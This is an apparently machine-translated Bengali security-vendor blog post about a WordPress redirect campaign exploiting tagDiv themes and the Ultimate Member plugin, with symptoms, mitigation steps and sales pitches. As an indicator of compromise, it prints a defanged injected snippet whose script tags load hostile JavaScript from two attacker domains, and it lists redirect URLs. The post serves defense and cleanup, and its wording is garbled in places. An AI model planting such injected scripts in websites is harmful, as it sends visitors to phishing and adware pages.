ওয়ার্ডপ্রেস রিডাইরেক্ট ক্যাম্পেইন:দুর্বল ট্যাগডিভ থিম এবং চূড়ান্ত সদস্য প্লাগইনস

প্রতিটি দিন অতিবাহিত হওয়ার সাথে সাথে, ওয়ার্ডপ্রেস সংক্রমণের ঘটনাগুলি সাধারণ হয়ে উঠছে যা দর্শকদের সন্দেহজনক পৃষ্ঠাগুলিতে পুনঃনির্দেশিত করে। সম্প্রতি, ট্যাগডিভ থিম এবং আলটিমেট মেম্বার প্লাগইনগুলিতে একটি দুর্বলতা আবিষ্কৃত হয়েছে। এই ওয়ার্ডপ্রেস রিডাইরেক্টে আপনার ওয়েবসাইটে হ্যাক ভিজিটরদের ফিশিং বা ক্ষতিকারক পেজে রিডাইরেক্ট করা হয়।

এই হ্যাকটিতে, ব্যবহারকারীদের, যখন পুনঃনির্দেশিত করা হয়, অবাধ URL সহ বিরক্তিকর পৃষ্ঠাগুলিতে নিয়ে যাওয়া হয়

hxxp utroro.com/xyz  or 

hxxp://murieh.abc/xyz or

hxxps://unverf.com/xyz

এবং পিশিং reCAPTCHA ছবি। প্রদর্শিত পাঠ্যটি উদ্দেশ্য প্রকাশ না করেই ব্রাউজার বিজ্ঞপ্তিগুলিকে অনুমতি দেওয়ার জন্য দর্শকদের প্রতারণা করার চেষ্টা করে৷

তাছাড়া, পিশিং এবং হ্যাক করা ওয়েবসাইটের বিরুদ্ধে আপনার ওয়েবসাইটকে কালো তালিকাভুক্ত করে Google আপনাকে জরিমানা করবে। ওয়েব ব্রাউজার আপনার ওয়েবসাইট পরিদর্শনকারী দর্শকদের একটি সতর্কতা বার্তা প্রদর্শন করবে৷

ইনজেক্ট করা ক্ষতিকারক স্ক্রিপ্ট

ইনফিউজড ইনফেকশন দুটি ওয়েবসাইট সাইটের যেকোনো একটি থেকে একটি কোড জড়িত:cdn.allyouwant.online। এবং cdn.eeduelements.com।

আগেরটি এই দূষিত প্রচারণার সাম্প্রতিক পর্যায়ে ব্যবহার করা হয়েছিল এবং পরবর্তীটি শুরুতে ব্যবহার করা হয়েছিল৷

...
<script type='text/javascript' src='hxxps://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script><script type='text/javascript' src='hxxps://cdn.allyouwant.online/main.js?t=lp1'></script></head>
...

বর্তমানে cdn.eeduelements.com স্ক্রিপ্ট সহ 1700+ সাইট এবং cdn.allyouwant.online স্ক্রিপ্ট সহ 500+ সাইট।

ওয়ার্ডপ্রেস রিডাইরেক্ট হ্যাক নিয়ে চিন্তিত? চ্যাট উইজেটে আমাদের একটি বার্তা দিন এবং আমরা আপনাকে এটি ঠিক করতে সাহায্য করতে পেরে খুশি হব। এখনই আমার ওয়ার্ডপ্রেস ওয়েবসাইট সুরক্ষিত করুন।

ট্যাগডিভ থিমে অ্যাটাক ভেক্টর

এই ওয়ার্ডপ্রেস শোষণের পিছনে প্রধান ব্যক্তিরা হল ট্যাগডিভ থিম এবং একটি জনপ্রিয় আল্টিমেট মেম্বার-এ সম্প্রতি পাওয়া (এবং ইতিমধ্যে প্যাচ করা) দুর্বলতা প্লাগইন, যার 100,000+ আছে সক্রিয় ইনস্টলেশন।

পুরানো tagDiv থিম এর জন্য , একটি ম্যালওয়্যার ইনজেকশন এই মত প্রদর্শিত হয়:

আল্টিমেট মেম্বার প্লাগইনে দুর্বলতা

আল্টিমেট মেম্বার প্লাগইনের দুর্বলতা হল অননুমোদিত আরবিট্রারি ফাইল আপলোড। যদিও 9ই আগস্ট, 2018-এ দুর্বলতা ঠিক করা হয়েছিল।

ওয়ার্ডপ্রেস রিডাইরেক্ট ক্যাম্পেইনের লক্ষণ:চূড়ান্ত সদস্য প্লাগইন শোষণ

1. Index.php নষ্ট হয়ে গেছে
2. /wp-content/plugins/ultimate-member/includes/images/smiles ডিরেক্টরিতে অজানা PHP ফাইল
3. ত্রুটির লগগুলি দেখায়:wp-content/plugins/ultimate-member/assets/dynamic_css/dynamic_profile.php লাইন 5 এবং লাইন 6 এ
4. ওয়েবসাইটটি অবাঞ্ছিত সাইটগুলিতে (অ্যাডওয়্যার) পুনঃনির্দেশিত হয়
5. হোমপেজে গেলে পপআপ দেখানো হয়
6. ক্রেডিট কার্ডের তথ্য চুরি হয়ে গেছে
7. সার্ভারে অজানা ফাইল তৈরি হয়
8. ওয়ার্ডপ্রেস এবং প্লাগইন ফোল্ডারে ফাইলগুলি পরিবর্তিত করা হয়েছে
9. index.php-এ জিবারিশ কোড

ওয়ার্ডপ্রেস রিডাইরেক্ট হ্যাক:মিটিগেশন

এই ওয়ার্ডপ্রেস রিডাইরেক্ট ইনফেকশন অন্যান্য অ্যাটাক ভেক্টর এবং সন্দেহজনক কোডের বিভিন্ন রূপ ব্যবহার করে। এখানে, ওয়ার্ডপ্রেস পুনঃনির্দেশ প্রশমিত করার কিছু পদক্ষেপ রয়েছে:

1. সকল থিম এবং প্লাগইন সর্বশেষ সংস্করণে আপডেট করুন।
2. এইচটিটিপি প্রমাণীকরণ সেট আপ করা পিএইচপি ফাইলকে আপলোড ফোল্ডারে সরাসরি অ্যাক্সেস থেকে বাধা দেয়। এটি অননুমোদিত মৃত্যুদন্ড রোধ করার জন্য।
3. ট্যাগডিভ সংক্রমণের ক্ষেত্রে থিমের অ্যাডমিন ইন্টারফেসে ম্যালওয়্যারটি খুঁজে পাওয়া যাবে এবং সরানো যাবে।
4. আল্টিমেট মেম্বার প্লাগইন শোষণের ক্ষেত্রে wp-content/uploads/ultimatemember/temp/-এর অধীনে সাবডিরেক্টরিতে সমস্ত PHP ফাইল মুছুন।

এই দূষিত পুনঃনির্দেশ প্রচারগুলি ঘন ঘন সংক্রমণ কোড এবং প্রভাবিত ফাইল পরিবর্তন করে। নিরাপত্তা বিশেষজ্ঞের সাথে পরামর্শ করা ভাল।

তাত্ক্ষণিক ম্যালওয়্যার পরিষ্কারের জন্য এখনই Astra নিরাপত্তা বিশেষজ্ঞদের সাথে পরামর্শ করুন৷ আমাদের শক্তিশালী ফায়ারওয়াল XSS, LFI, RFI, SQL ইনজেকশন, খারাপ বট, স্বয়ংক্রিয় দুর্বলতা স্ক্যানার এবং 80+ নিরাপত্তা হুমকি থেকে আপনার ওয়েবসাইটকে রক্ষা করে। এখন আমার ওয়েবসাইট সুরক্ষিত করুন৷৷